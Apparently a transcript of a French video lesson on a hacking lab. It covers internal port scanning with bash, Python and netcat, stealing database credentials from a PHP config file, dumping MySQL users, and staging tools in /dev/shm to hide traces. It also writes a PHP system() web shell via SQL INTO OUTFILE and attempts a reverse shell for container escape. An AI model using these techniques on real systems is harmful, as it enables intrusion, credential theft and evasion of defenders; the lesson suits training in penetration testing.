ils permettent de fournir des variables d'environnement, d'accord, à partir du système d'exploitation hôte. Ça se fait grâce à notre fichier Docker env, d'accord. Le fichier il se trouve tout le temps à la racine, hein, mais c'est le cas. Là, on le voit, je suis à la racine de mon système de fichiers. Je vais zoomer pour toi. Si je fais un pwd, on est bien à la racine, d'accord. On va se faire une petite une petite box avec les outils quand même, hein. Et je t'avais dit, tous ces outils, ils ont quoi? Leur particularité, c'est ce sont des binaires statiques. C'est-à-dire quoi? Ben, il n'y a pas de dépendance. D'accord? Ils ont été compilés avec leur propre dépendance. Ça veut dire que si je déploie, et si j'arrive à déployer quoi? J'arrive plus à taper. Euh, Netcat ou Socat, j'ai pas besoin d'internet, j'ai pas besoin des dépendances sur la machine. Ils ont eux-mêmes leurs dépendances. Alors t'as compris que ça fait des binaires beaucoup plus gros à transférer, mais ça fait parfaitement le taf. Et ils sont autonomes. Donc toujours privilégier des binaires compilés statiquement, d'accord. Et ensuite, à un très haut niveau, non seulement binaires compilés statiquement, mais aussi offusqués, d'accord, pour contourner les signatures, l'heuristique. Donc, la première méthode d'analyse de port qu'on va couvrir, on va en revenir aux fondamentaux. C'est-à-dire, on est sur du Linux, il y a Bash, on va utiliser Bash. D'accord? Alors, qu'est-ce qu'on peut faire? Ben, dans Dev, je vais vous montrer, il y a quoi? Il y a plein de trucs. Hein. Dev, il y a des périphériques, il y a un peu tout. Hein. J'ai mon CPU, j'ai mes files descripteurs, les FD, j'ai beaucoup de choses. Hein. Là, on commence à taper en bas niveau. Tu vois, tu as même la NVRAM de mon SSD. Tu as mon SSD qui est ici. Tu vois, ça commence à taper en très bas niveau. Donc, ce qu'il faut retenir dans Dev, en fait, ça contient toutes les périphériques matériels. Hein. Tu as les NIC, dont je t'ai parlé, les NIC, hein, c'est les contrôleurs réseau, les cartes réseau, les HDD, les SSD, les RAM. Tu as tes pseudo-terminaux, TTY, t'as beaucoup de choses. Et dans Dev TCP, on va revenir sur notre machine, j'ai pas envie de casser la mienne. En grosso modo, donc dans Dev, toutes les périphériques, et dans Dev TCP, c'est ce qu'on appelle un pseudo périphérique. Comme tu as des pseudo terminals, hein, tu as des pseudo devices. Alors, on appelle ça un pseudo périphérique. Ça peut être la carte Ethernet sans fil, hein, qui va ouvrir un support lorsque les données sont dirigées vers l'intérieur ou vers l'extérieur. Tu sais qu'en réseau, on a ce principe d'ingress et d'egress. Hein, je t'ai dit, dans le monde militaire, c'est l'infiltration, l'exfiltration. On va utiliser ce terme quand on fait de la cyberguerre ou des menaces persistantes avancées, mais en réseau, tout simplement, l'ingress, c'est l'entrée et l'egress, c'est la sortie. D'accord? Puisque quand tu fais quoi, tu veux faire communiquer deux machines, tu veux te connecter à Internet, c'est un canal bidirectionnel, d'accord, dans les deux sens. Hein. Je downstream et je upstream, d'accord. J'ai un flux montant, j'ai un flux descendant. Je peux uploader et je peux télécharger, d'accord. Donc je vous mettrai la documentation Linux, c'est toujours bon à creuser. Hein. Moi-même j'irai creuser, hein, parce que si je savais tout, ça se saurait. Mais on va se servir justement, hein, de ça à notre avantage. Je vous ai dit qu'en quelques lignes de code, on peut analyser les ports internes. Ben, on va ajouter une liste de ports et je vais vous montrer comment on peut faire un bash complet, hein, un petit programme, un petit script, 4 lignes de code. D'accord? Donc, ça, pareil, tu dois l'apprendre par cœur. 4 lignes de code à retenir. Et ça sera tout le temps la même chose. D'accord? Tu vas modifier, certes, les variables. Hein, on va initialiser une variable qui s'appelle ports. Tu mets ce que tu veux. Hein. Moi, je vais utiliser les ports, hein, qui sont connus. On a quoi? On a le 21, le 22, le 53, le 80, le 443, le 3306, le 8443 et le 8080. D'accord? Alors, 21 FTP, 22 SSH, 53 DNS, 80 HTTP, 443 HTTPS, 33 MySQL. Le 8080, c'est généralement les proxys, les serveurs mandataires. Hein, on utilise ça pour Burp Suite notamment, mais pas que. Et le 8443, eh ben, c'est du HTTPS. Et là, tu vas me dire, mais non, Saltin, qu'est-ce que tu me racontes? Le HTTPS, c'est le 443. Ouais, mais t'as vu, c'est 8443. Ah, intéressant. Pourquoi c'est ça? Alors, je développe un peu, hein, ça c'est important. Vous connaissez tous le HTTPS, d'accord? Transfert de protocole hypertexte sur Secure Socket Layer. Et c'est un canal HTTP sécurisé, hein, qui est simplement une version sécurisée de HTTP. Le HTTPS, ça équivaut à ajouter une couche SSL à HTTP pour le sécuriser. C'est pour ça qu'on parle de secure. D'accord? Grâce à SSL, c'est requis pour avoir du contenu qui est chiffré.
d'accord, qui est crypté. Mais on dit chiffré. HTTPS, il a un port par défaut différent de HTTP. HTTP 80, HTTPS 443. D'accord? Et c'est ça qui permet de chiffrer donc des méthodes d'authentification de communication chiffrées sur le port 443. Mais en fait, le SSL, pour le faire tourner, eh ben, il tourne sur le 8443. Tomcat, en fait, hein, Apache Tomcat, une autre couche, utilise le 8443 pour rediriger le trafic SSL HTTPS. Ça permet d'éviter les conflits de port SSL. D'accord? On utilise généralement le 8443 pour Tomcat. C'est pour ça que c'est ça que je vais essayer de rechercher, voir si éventuellement il n'y a pas cette composante. D'accord? S'il ne trouve pas la plage de port système protégé, c'est comme ça que ça va permettre d'éviter les conflits de port lors de la configuration du trafic du serveur quand on a un proxy, un cache pour les ports. D'accord? Donc on dissocie. Hein. Tomcat, lui, il mange certes du SSL sur le 8443, à l'inverse, le SSL, cette surcouche pour le HTTP et ça devient HTTPS, c'est sur le 443. Shebang, 4 lignes de code, on a dit. Dans bin, j'appelle bash, hein, histoire d'avoir quelque chose de fonctionnel, pas utiliser SH. On initialise une variable, on va l'appeler port. Hein, là, on va lui passer de multiples choses. On a dit 22, 53, 80, 443, 8443, 33, 06, 80, 80. Ensuite, boucle for. On va parcourir, itérer. Donc c'est là. On travaille sur quoi? Sur notre variable, d'accord. On lui passe donc port. Et il nous faut un tableau, un array. Hein, et c'est là qu'on va venir tout simplement tester. Hein, 21, 22, 53, 83 de façon récursive. Je vais lui caler un arrobase. On pense bien ensuite à refermer. Hein, la syntaxe est particulière. Si vous débutez, fin de l'instruction. Et on lui dit fait. D'accord, fait quelque chose, il lui faut un timeout, c'est-à-dire que je vais lui caler 1 seconde de décalage entre les différents scans. On va utiliser bash c pour lui dire fais tout de suite, donc tu écho. Qu'est-ce qu'il faut? Il nous faut notre bypass, donc pareil, ça c'est au niveau de la syntaxe. Sinon, avec les double quotes, ça va poser problème. Hein, port scan, vous lui mettez ce que vous voulez. Hein, donc vous voyez que là ça devient en jaune, c'est pas bon. Il faut que j'échappe à nouveau. Voilà, ça reste en vert, c'est que c'est bon. Et ça, on redirige vers dev 1, 1, 1. D'accord, notre passerelle. Et on va lui dire tu parcours les ports. Hein, donc grâce au dev TCP, on va pouvoir scanner les ports internes. Et une fois que c'est fait, on peut lui dire autre instruction. Tu vas me les afficher, hein, puisque je veux read, je veux lire les ports. Et on va lui dire quoi? Port is open ou est ouvert, hein, si vous voulez le mettre en français. D'accord? Et ensuite, ça, c'est nos opérateurs logiques. On va sur DevNull. Hein, je vous l'avais expliqué. Je referme. Voilà. Tout passe en jaune. Là, on est bon. Et enfin, si on a fait un for, il faut faire notre done pour sortir de notre boucle. Donc ça, c'est un premier script. Ok. Alors, on peut le tester. D'accord? Et on retrouve des ports qui nous sont utiles pour communiquer avec Internet. 53 DNS, 80 HTTP, 443 HTTPS et le SSL Tomcat sur le 8443. Ok, ça fonctionne. Comment on peut faire en Python? On va faire un peu le même principe, sauf que on va s'ouvrir un raw socket. Hein, on va établir une communication grâce au socket. Ça permet d'établir une communication et surtout d'activer la connectivité réseau. D'accord? Donc, on va essayer de faire aussi simple. Hein. Le but, c'est d'ouvrir des connexions à ce qu'on appelle un port de séquençage et on va utiliser une boucle, pareil, pour parcourir tout ça. D'accord? Donc, voilà un scanner de port que vous pouvez utiliser. Alors, on va clean.
sudo, on va l'appeler scan.py. Pareil, commence toujours par notre shebang. Tu vas aller taper, généralement c'est dans user, t'as Python 3. On va prendre la dernière itération, dernière version. Qu'est-ce qu'il nous faut? Il nous faut un port socket. On a besoin de socket. Pourquoi? Pour établir notre communication. Le host, on l'a vu. On a vu qu'on tape sur le 1, 1, 1, 1. D'accord? Puisqu'on est en train de scanner tout simplement des ports internes. D'accord? Alors, je vais faire ça. Vous savez qu'on utilise le camel case. La deuxième est tout le temps en majuscule. C'est une convention pour l'initialisation, la déclaration de nos variables. Donc là, c'est un peu différent. Pareil. Qu'est-ce qu'on fait? On va se faire une liste. 80, qu'est-ce que j'ai dit? 480, 3306, le 8443 et le 8080, je l'ai déjà mis. Je crois qu'on est bon. D'accord. Ensuite, pareil, boucle for. Donc for port in. Qu'est-ce qu'on vient d'initialiser? On travaille sur port list. Ok. Là, très important. Quand vous faites une boucle, il faut pas oublier les deux points. Notre indentation, on va faire une tabulation. S comme socket. Alors là, on est en train d'établir ce qu'on appelle un row socket. C'est typiquement en Python. Ce que vous allez faire, on va utiliser sockstream et AF-inet. Typiquement, quand vous voyez ce code, c'est le précurseur de l'ouverture d'une connexion à l'autre, avec les ports spécifiés. En fait, pour établir un canal de communication, on utilise cette commande. D'accord? Ça, c'est la commande en bas niveau, si tu veux, pour faire appel à notre pile TCP/IP, et ça va nous permettre de gérer le socket qui gère nos canaux de communication. D'accord? Donc, on fait appel aux fonctions, sockstream, je referme. Ensuite, ça devrait être bon au niveau de l'indentation. On va lui donner les droits. Scan. Socket no attribute. Ouais, stream. Oh là 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 là. Au niveau de l'indentation host port, ça devrait être bon maintenant. Bon, port 21 fermé, 80 fermé, donc voyez, il y arrive, il a un peu de mal, il est un peu lent, donc là c'est pareil, c'est pas ça qui nous intéresse. Donc, c'est ça qu'il faut retenir. Donc maintenant on a un shell stabilisé, c'est là que ça devient intéressant, et je vous disais, si je clean, ça passe, clear, ça passe, clear, ça passe pas, il veut les variables d'environnement aussi, terme. Ah si, donc il faut les deux, excusez-moi. 256 color comme le mien, et maintenant je peux faire un clear et on a notre appel de commande. Parfait. Donc là on commence à avoir un shell fonctionnel. Donc je vous disais, netcat, je sais qu'il est installé sur la machine ZV, et je vais lui dire écoute, tu as une petite machine en 101, tu vas venir me pinguer tout simplement le premier 65 535, puisque le 0 est généralement réservé, même tout le temps. Et vous pouvez tout à fait utiliser netcat pour pinguer. Là, on voit qu'on c'est une instance Amazon, et on récupère bien. Vous voyez? Donc, bash, Python, netcat. Vraiment les bases pour commencer à scanner. D'accord? Donc ça, c'est ce qu'on appelle les attaques des morts vivants, hors de la terre. Non, ne le traduis pas. Ça s'appelle du living off the land. D'accord? C'est utiliser des binaires compilés statiquement ou qui sont présents sur le système d'exploitation, soit pour faire de la reco, de l'énumération, soit pour pirater. D'accord? Alors rappel, je vous l'ai dit en préambule dans la précédente vidéo, ou tout à l'heure, tout va dépendre du montage, je fais ça en décalé, mais il faut bien se rappeler qu'un binaire compilé statiquement, c'est similaire à tout binaire, mais il a toutes les bibliothèques et les dépendances incluses. D'accord? Ça va permettre d'exécuter sur n'importe quel système avec la même architecture. Ça, c'est important. Ce qui tourne sur x86 tournera pas sur x64. D'accord? Enfin, si. Mais x64 ne tournera pas sur x86. Ce qui est sur ARM, vos téléphones, vos tablettes, ne fonctionnera pas ni sur x86 ni sur x64. D'accord? Donc, je vous mettrai un repo qui est bon à aller avoir. C'est beaucoup de binaires statiques. Après, je vous conseille d'apprendre à faire des binaires statiques. Mais vous avez un Judy. On va aller voir son git. Voilà, vous avez static binaires. Je suis allé, il est là. Voilà. Et là, vous avez des
$nix, des wildcard nix, donc Unix, Linux, vous avez des outils qui ont été compilés, d'accord, qui vont vous permettre, vous pouvez les pousser sur la machine à pirater et comme ça, vous serez tranquille, d'accord. Voilà, donc ça c'est une chose. Donc, qu'est-ce que je peux en conclure? Petite phase de reconnaissance. Il y a une machine en 192.168.1. Ça tombe bien. C'est le Docker qu'on va devoir pooner. Et 22 80 33 06 80 80 et 33 60. D'accord? Alors, on va continuer. Qui dit base de connaissances dit donc qui dit base de données dit commencer à rechercher les fichiers de conf. Hein. Le premier truc qu'on devrait faire, je te le dis, hein, à chaque fois, c'est regarder l'history, hein, à tout hasard. D'accord, ce qui a été tapé, mais ça c'est moi. Qu'est-ce qu'on irait faire? On irait aller dans le home, voir les fichiers de conf de l'utilisateur, hein. L'historique, là il y en a pas. On peut regarder les variables d'environnement, hein, et on voit, d'accord, Apache est installé là, home, all password, d'accord, www.data, d'accord, c'est intéressant. Hein, qu'est-ce qui pourrait attirer notre œil ici? Eh ben là, pas grand chose parce que j'ai modifié les variables d'environnement, hein, mais en principe, vous savez, hein, on tourne dans var, www, et là, il y a plein de trucs. Je retrouve quoi? Le WordPress, le user.txt, le HTML, le dev, qui fait tourner le sous-domaine dev, admin. Tiens, on va aller dans admin. Il y a peut-être des trucs croustillants. Et bien sûr qu'il va y avoir des trucs croustillants. Je retrouve, d'ailleurs, je vais vous le montrer, comment on a pu exploiter la LFI. Vous vous rappelez? On avait vu un commentaire qui était posé, mais nous, on avait vu ça. Mais techniquement, c'est là, la ligne faillible. D'accord? Dans la H4 class, card title, qu'est-ce qu'il fait? Il injecte. C'est là qu'il injecte son truc. D'accord? Donc, on avait le commentaire, mais pour nous, c'était pas visible. Si je dis pas de bêtises, reprenons. Si j'analyse maintenant la page, pardon, autant pour moi, ou je l'ai pas vu. C'est peut-être aussi, parce que j'avais pas les yeux en face des trous. Non. Tu vois bien que quoi? Tu ne vois pas la H4. Elle est pas visible. D'accord? Je suis pas au bon endroit. Wow. Donc tu vois bien que la H4 pour toi, d'accord, c'est grâce à ça en fait qu'on le sait. D'accord? Donc à chaque fois, il faudra tester, et c'est pour ça que là on a l'aide. Mais comment? Si j'avais pas eu cette indication, j'aurais pu trouver. Mais tu l'as compris, je te l'ai montré la dernière fois avec wfuzz. D'accord? On aurait faisé le paramètre. Mais si tu n'avais pas cette indication pour te dire qu'en fait là il y a un truc que tu vois pas, tu peux pas l'inventer. Mais tu vois qu'en fait c'est inséré ici. Mais c'est pas visible dans le code source. Donc pareil, quand tu débutes, ne crois pas parce que tu as demandé à ton navigateur d'aller dans le code source que tu vas forcément tout voir. Là, c'est le meilleur exemple. Là, c'est le vrai code source. Là, j'ai tout. Là, j'ai pas tout. D'accord? Donc ça, c'est pour... Voilà comment on a poussé la RCE, notre porte dérobée et récupérer notre reversal. Ça, c'est une chose. Mais ensuite, on a le DB Connect. Et dans le DB Connect, en effet, on va avoir des DB comme database et connect. Et là, tu comprends bien que ça commence à être game over. D'accord? Alors, qu'est-ce qu'on peut faire? Chercher à se connecter. On ne peut plus simple. Qui dit base de données, on va essayer de taper dedans. D'accord? Donc, lorsqu'on arrive sur un serveur, on attaque un serveur web, on peut supposer qu'il exécute du langage structuré de requête qu'on appelle du Structure Query Language, aka SQL. D'accord? SQL, disent les Américains. Donc on a quoi? On a un serveur qui me présente finalement via une application des choses qui sont en base de données côté back-end. D'accord? Mon front-end, c'est mon serveur web et derrière, il y a un back-end avec une base de données. Généralement, elles sont sécurisées pour qu'on puisse pas l'atteindre de l'extérieur. Mais maintenant que je suis dans le conteneur, sur le serveur qui fait tourner le conteneur, là, je peux ouvrir les fichiers de conf. Donc, ça vous arrivera. Si vous voyez MySQL, allez tout le temps récupérer des informations, dbconnect.php, là en l'occurrence nous fournit les identifiants de l'administrateur. D'accord? Donc les serveurs web, ils ont besoin de ce fichier pour connecter, interconnecter le PHP qui fait fonctionner le site web et le SQL qui permet via le moteur SQL de la base de données d'interpréter les données, de les livrer, de les donner
au serveur qui va vous les servir. D'accord? Donc ce fichier, il n'est pas atteignable en principe de l'extérieur. Mais comme on est à l'intérieur, et ben là on voit que c'est pas sécurisé et on va pouvoir justement chercher ça soit dans var www. Nous, dans ce cas précis, vous voyez qu'il est dans var www admin. Donc on voit qu'on a de nombreuses informations, hein, adresse du serveur, mot de passe, nom d'utilisateur, nom de la base de données, ça va nous aider à accéder à la base de données et la piller, vous avez compris, et on va même injecter une porte dérobée. On va pouvoir exfiltrer les noms, les mots de passe de la base de données, hein, on va analyser les tables, et puis on pourra ensuite faire des choses encore plus sales, si vous me permettez l'expression. On va injecter directement une porte dérobée pour récupérer et surtout pour s'échapper, pour faire le jailbreak. Hein, je te disais, le jailbreak sur son téléphone, c'est casser les sécurités pour pouvoir installer des homebrew, des installations personnalisées sur ton téléphone. Par exemple, si tu fais un jailbreak, mais nous, le jailbreak, c'est s'échapper de la dockerisation, de la compartimentation, de la segmentation réseau et s'échapper du sandboxing de cet environnement. D'accord? Là, si on a accès à MySQL, si MySQL tourne en tant que root, j'ai peut-être quoi? J'ai peut-être mon sésame. Pourquoi? Mauvaise configuration. On va analyser la surface d'attaque. On continue. Donc, si vous avez des doutes, premier truc à faire, c'est un PSAUX. D'accord? PSAUX, mais je suis pas root, donc je pourrais pas tout voir. Mais je vois qu'il y a du MySQL qui fait tourner ça. Ça peut être intéressant. Hein? Donc, on va voir, on va se connecter au service et voir si, tout simplement, je peux m'y connecter. Qu'est-ce que je peux lui dire? MySQL, en tant qu'utilisateur, admin, d'accord? Donne-moi un mot de passe et je vais me connecter sur le 127.0.0.1, le localhost. Non? Donc, si ça ne marche pas sur le localhost, donne-lui l'adresse. C'est celle qu'on a pingée, c'est la 101. Et là, tu vois qu'on est dedans. OK? Donc, on est connecté. On va énumérer. Qu'est-ce qu'on peut faire? Show databases. Hein, n'oubliez pas databases. N'oubliez pas le point virgule. Sinon, il vous met une flèche. Ça veut dire, attends, genre, je comprends pas. Tu veux quoi? Fin de l'instruction? Point virgule? Ah, là, je comprends mieux. D'accord? Donc, le 6, parfois. Schema, MySQL Information Schema, ça nous intéresse pas. Pourquoi? Parce que c'est toutes les tables qui permettent la configuration de la base de données. Par contre, dashboard, c'est pas commun dans du MySQL. Donc, on va lui demander de sélectionner use dashboard db. D'accord? Qu'est-ce que je peux lui faire? Show tables. Montre-moi les tables. D'accord? User. Qu'est-ce qu'on peut faire? Je peux lui faire un show columns. Montre-moi les colonnes de quoi? De la table. From. Et la table, elle s'appelle users. Point virgule. Ah, intéressant. Qu'est-ce qu'on voit? On voit deux champs. Username et password. C'est des varchar. Donc, des caractères qui permettent de stocker une variable. 256 en espace. D'accord? Donc ça, c'est important, c'est au niveau de la longueur. Si jamais mon username est plus long que 256 caractères, ça va planter. OK? Nul, yes, yes. Défaut, nul, nul. OK. Donc, qu'est-ce qu'on peut lui dire? Du coup, select wildcard from table users. Voilà, on a exfil. On voit qu'on a un autre utilisateur qui s'appelle Gorak, qui a 4A, et on a l'admin DB Manager Login. Ok, donc là c'est intéressant. Je vais sortir de là. Je vais aller dans www, dans HTML, pardon. Donc là, pour l'instant, on a un index HTML. On va essayer via un outfile. On va stocker en base de données et on va lui dire, écoute, maintenant je veux injecter. On va injecter une basique RCE. Hein. On va coder ça en PHP, une ligne de code. On va prendre sensiblement quelque chose qui ressemble à ça. D'accord? Donc tout simple. Hein. Qu'est-ce qu'on lui fait? On ouvre notre PHP, on le referme ici, on fait
on utilise la fonction système pour faire un appel système. $get, on récupère la valeur de CMD. Du coup, CMD, je peux travailler dessus, il devient faillible et je peux commencer à injecter, passer mes commandes. D'accord? Il va venir récupérer la valeur de CMD. Si je lui passe ls-1, ben, il va faire un appel système, il va exécuter ls-là, hein, tu l'as compris, ou autre chose. Donc c'est ce qu'on va faire. Là, j'ai pas de fichier. On va maintenant attaquer la base de données. Donc je vous mettrai la documentation, hein, si vous voulez vous amuser. Nous, on va faire simple et efficace. Hein. On est dans le conteneur, on a effectué notre collecte d'informations, Intel Gathering, connaissance de la situation. Ok, Situational Awareness. Je veux maintenant m'échapper en exploitant la base de données distante. Alors, on a plusieurs façons d'échapper du conteneur. Généralement, c'est à cause des mauvaises configurations du conteneur. Je vous ai dit, il va falloir les sécuriser, hein, à partir de services ou de contrôle d'accès. Alors, on a une cheat sheet, hein, disponible. Hein, si vous avez des doutes, vous pouvez toujours aller taper là-dedans. Voilà, elle est là. D'accord? Donc voilà, quand tu pentest, commence par lire ça. Hein. Tu peux aussi aller voir la CVE 2019 1427, hein, puisqu'on va utiliser en partie ce set file. Hein. Enfin, la logique. Hein. Le défaut de logique, c'est le même. Hein. Je vous ferai peut-être une vidéo dédiée. Donc, c'est l'unité 42. Hein. C'est l'unité cybersec de Palo Alto, fabricant de matériel réseau. Ils sont très bons. Hein. Ils vous montrent comment on peut jailbreak. D'accord? Donc, je vous conseille d'aller lire l'article, hein, pour bien comprendre la CVE. Voilà, vous avez le code, vous avez tout. Hein. Comment on peut s'échapper. Et vous voyez que une fois qu'on comprend le truc, c'est assez simple. Hein, vous avez le Docker là-haut. Enfin, vous avez la machine normale et le Docker en bas. Et vous allez voir que on va venir exploiter, tout simplement. Donc ATville, ça marche pas. Il fait son copie dans varlog. Ok. ls. hostfs. On voit les villes qui viennent d'apparaître. KTville, il le lit en dehors. Pourtant, voilà, c'est dans le conteneur. Il arrive à lire. Donc voilà, petite preuve de concept. Hein, allez lire ça. Donc on le voit ici, hein, en fait. Hein. C'est justement, ça va vérifier le contexte, hein, au niveau du doctar. Ensuite, si l'arborescence est vide, hein, justement, ça montre le procfs, hein, s'il existe. Donc on va jouer, hein, sur les namespaces. Nous, c'est typiquement une faille comme ça, hein, qu'on va venir exploiter. Donc je vous mettrai tout. Quand j'aurai le temps, je ferai ça. D'accord. Je vous avais dit aussi que je ferai une vidéo sur Cobalt Strike. Voilà. Tout va dépendre. Écoutez, en fonction du boulot que j'ai. Donc nous, si on doit résumer, hein, on a DeepSea, hein, que je vous conseille d'aller chercher aussi. Je vais vous le montrer vite fait. DeepSea, Docker Enumeration. D'accord. Donc allez le récupérer. On va se le lancer. Comment je peux le lancer? Je l'ai téléchargé. On va s'ouvrir. Je sais pas où il est le DeepSea. Où c'est que je l'ai mis? Je l'ai mis là, je crois. Ouais, c'est DeepSea. Ok, donc je vais ouvrir le port 80. Sudo fw holo 80, ça ira amplement. Ok, du coup, on peut Python, voilà. Et qu'est-ce que je peux faire? Je peux aller dans temp. Alors, on peut aussi feinter. Hein, ça, je vous l'ai pas dit. Quand on fait du living off the land, en fait, vous avez, je vais vous montrer. Voilà, dev SHM. Tu vois que j'ai 64 MO. Donc tout va dépendre de la RAM installée. Hein. Moi j'ai beaucoup de RAM sur ma VM.
Tu vois que moi, j'en ai 11. Alors, c'est quoi? On va faire très simple. C'est un RAM space. Hein, c'est un RAM swap, un RAM disk, appelle-le comme tu veux. Ça permet d'accélérer, hein, les applications. Et surtout pour nous, l'avantage, c'est que quand l'ordinateur redémarre, ça va effacer tous nos indicateurs de compromission. Donc les hackers, les pirates, les pentesters, les red teamers, vas-y, coche la mention inutile, raye là. Le RAM disk, c'est un disque virtuel qui utilise une partie de la mémoire centrale. D'accord? Donc par définition, les données stockées en RAM sont volatiles et donc un disque virtuel créé dans la RAM ne perdurera pas tant que l'alimentation est présente ou tant qu'on ne démonte pas le disque. En contrepartie, l'avantage est une vitesse d'accès aux données très rapide et sans commune mesure avec ce qu'on peut avoir avec un disque dur. Donc on a le TM, c'est justement ça, hein, le TMPFS, qui va implémenter dans le noyau, grâce au noyau Linux, dev SHM. D'accord? Donc c'est quoi? C'est un système de fichiers temporaire. D'accord? Il est monté comme un disque dur, mais les données sont écrites en RAM. Donc shared memory. Et c'est ça qu'on va utiliser tout le temps, tout le temps, tout le temps. Alors tu vois que je peux quoi? Je peux aller. C'est comme un disque. Tu vois? Donc en fait, à chaque fois que tu pirates un Linux, hein, c'est des techniques avancées de hacking, tu vas écrire là-dedans. Le problème, c'est que si tu commences à écraser quoi? La mémoire. Là, tu vois que j'en ai beaucoup. Mais nous, on n'en a pas beaucoup. Donc, avec parcimonie. D'accord? Mais l'avantage que tu as, c'est que les administrateurs débutants, ils penseront pas à aller voir, d'accord, dans la shared memory, et nous, ça nous permet d'éviter à chaque fois de quoi? D'effacer nos traces, d'accord? Ça va l'effacer pour nous. Généralement, t'as quoi? On va dire que, allez, le serveur, il est redémarré tous les mois. Si c'est un Linux, il est redémarré toutes les semaines, ou tous les 10 jours, ou tous les 15 jours, si c'est un serveur Windows. Donc, voilà, ça peut être utile. Et après, rien ne t'empêche, hein, si tu veux être vraiment vicieux, de faire un reboot une fois que t'as quoi? T'as piraté, exfiltré les données d'un serveur Linux, il va redémarrer et ça va réinitialiser SHM et ça va effacer tes traces. Youpi. Mais il faudra effacer les logs aussi, hein, je te rassure. Donc, on va voir. Hein, est-ce que ça marche? Moi, j'en ai aucune idée. Hein. Ça devrait, non? En théorie. wget, il l'a pas. On va se faire un curl. Curl, tu l'as? Ok. Donc, on va lui dire curl. Deep.sh. Qu'est-ce qu'on veut d'autre? Taper sur mon serveur. Alors, j'oublie tout le temps l'adresse IP. Port 8080 deep.c.sh. Voilà. Donc là, on voit que il l'a écrit, pas de problème. Et en plus, l'avantage que vous avez, c'est que les programmes vont charger beaucoup plus vite. Hein. Donc, pour faire de l'énumération, c'est bien. Tu vas pas attendre que le disque dur gratte. Hein. C'est chargé en RAM et bim, ça va venir inspecter. Donc, on va pouvoir se lancer. Il faut quand même lui donner les droits. Alors, on va voir les commandes. Dips, qu'est-ce que j'ai fait? Ah putain. Pourquoi il me le prend pas mon point? Permission denied. Alors, typiquement, là tu vois que on est un petit peu de la... Il veut pas qu'on l'exécute ici. Non. Parce que c'est quand même un répertoire assez particulier et qui appartient à root. Tu vois? Et comme nous, on est en www-data, là, il nous jette. Donc, ça sera pas toujours possible. Alors là, tu vas me dire, ouais, mais bon, alors ça marche pas ton truc. Des fois, ça dépend de la configuration. D'accord? Là, c'est root et malheureusement, on n'est pas root. Donc, ouais, là, ça bloque. D'accord? Donc, qu'est-ce qu'on va faire? C'est pas grave. Je vais le rapatrier vers TMP. TMP, on a tous les droits. Donc, je vais faire un CP. Je vais prendre deep.sh et je vais lui dire, tu me le mets dans TMP et après, on va venir exécuter tmp deep.sh help
Voilà. Donc, on va essayer d'exploiter. On pourrait essayer. On va essayer un E privilege. On va voir. Donc vous l'avez compris, c'est l'équivalent de quoi? C'est l'équivalent d'un linpiece pour le Docker. D'accord? Donc on voit le Docker, on a l'adressage. Bon, ça c'est des infos qu'on avait déjà. Les utilitaires utiles, intéressant. On voit des capacités qui pourraient être exploitées au niveau du noyau, KPSH. SSHD, non. Entry point, des fichiers intéressants. Donc ça, c'est ce que j'ai mis. Et il nous dit, ça c'est intéressant, il nous dit quoi? Il nous dit qu'on n'a pas le droit à Shadow. Et il nous dit que par défaut, les conteneurs peuvent communiquer avec d'autres conteneurs sur le même réseau. Et ça va permettre d'énumérer. D'accord? Et il nous dit, on peut pas ping sweep, il n'y a pas une map ou ping. Donc, voilà. Qu'est-ce qu'on peut faire? On va réessayer. No exploit. Can't shift many. Ok. Oui, mais donne-moi les alors, mon gars. Gentil. Alors, on va essayer d'attaquer. Create new user. Je pense pas qu'on puisse. Enfin, qui tenterait en arrière, tu me diras. Alors, tac, type SH. 107 sur le 4443, si je dis pas de bêtises. 1050 107 201 1050 1050 201 107. Ouais, je suis un vrai dyslexique. C'est officiel. On va s'ouvrir le port. Sudo ufww 4443. Ok, net4 LNVP sur 4443. Voici, balance la sauce, tonton. Et ça ne marche pas. Docker sock not found. Donc là, on se retrouve dans une situation épineuse où il nous faut trouver autre chose. D'accord? Au moins, je vous aurais montré un Gypsy. Que je vous conseille de mettre dans votre toolbox, dans votre boîte à outils. Ok, mais il nous reste quoi? Il nous reste la CVE. Oui, certes, d'accord, on pourrait l'exploiter. Mais on a une base de données distante. Je peux l'utiliser pour exécuter des commandes et m'échapper du conteneur MySQL. Ça serait quoi la méthode? Accéder à la base de données grâce au mot de passe qu'on a volé, c'est fait. Créer une nouvelle table dans la base de données principale, injecter du code PHP pour obtenir ma commande. Ensuite, à partir de la table, exfiltrer vers un fichier accessible vers l'utilisateur pour pousser une RCE. Qui dit RCE dit River Shell, dit quoi? On s'échappe de la prison. D'accord? Alors, on peut faire ça sans problème. Qu'est-ce qu'on va lui dire? On peut en une commande déjà faire 4 étapes sur 6. La première étape, vous l'avez vu, c'est quoi? On va se connecter. Donc on est reparti, on va se connecter à nouveau à la base. Ok, il aime pas ça. MySQL admin H.
Pourquoi elle bug là? Attends. MySQL. User admin. Qu'est-ce qu'on a dit? P, H, grand H ou petit H? Je sais plus. À chaque fois, je m'embrouille. 192, 168, 101. Voilà, c'est petit H. Autant pour moi. Ok. Donc, première étape, connecter. Ensuite, deuxième étape, injection. D'accord? Select. Je vais lui dire, on ouvre mon snippet en PHP, $. On récupère quoi? Bah, on travaille sur CMD. Ok, donc CMD, si on travaille sur CMD, il faut en PHP récupérer la valeur. $get. Sur quoi? Bah, sur notre paramètre. On a dit quoi? La variable s'appelle CMD. On va rester là-dessus, mais je vais changer. Je vais mettre Toto. Pourquoi je mets Toto? Parce que j'ai peur qu'un autre élève écrase. D'accord? Donc moi je vais mettre Toto. Tout va être Toto. D'accord? Comme ça, je sais qu'il y a pas quelqu'un qui va venir écraser mon script. Système, on fait appel. Notice call sur Toto. D'accord? Qu'est-ce qu'on fait? Fin de l'instruction. Et il nous faut sortir de notre snippet PHP. Je referme parce que j'ai ouvert. Ensuite, into à l'intérieur de vers, si tu veux. Quoi? Un fichier de sortie, outfile. D'accord? Ça, c'est du langage SQL. Hein. C'est pour ça que je devrais tout mettre. Je te le dis toujours, je le fais pas. Fais ce que je dis, pas ce que je fais, comme Macron. Hop là! D'accord? C'est du SQL. Donc, majuscule. Et je lui ai dit, écoute, dans var, tu vas aller dans www.html ou www.admin, en fait, on s'en fout. Ouais, je vais lui dire admin. Et tu enregistres toto.php. D'accord? Hop là! Est-ce que ça va marcher? Oui, si je mets un point virgule. Toto 1. Ok, bon, je sais pas. Il y a peut-être encore mon fichier, ça veut dire qu'ils n'ont pas redémarré la machine. C'est possible. C'était peut-être moi qui suis passé. Il n'y a qu'un Toto sur Terre, hein, 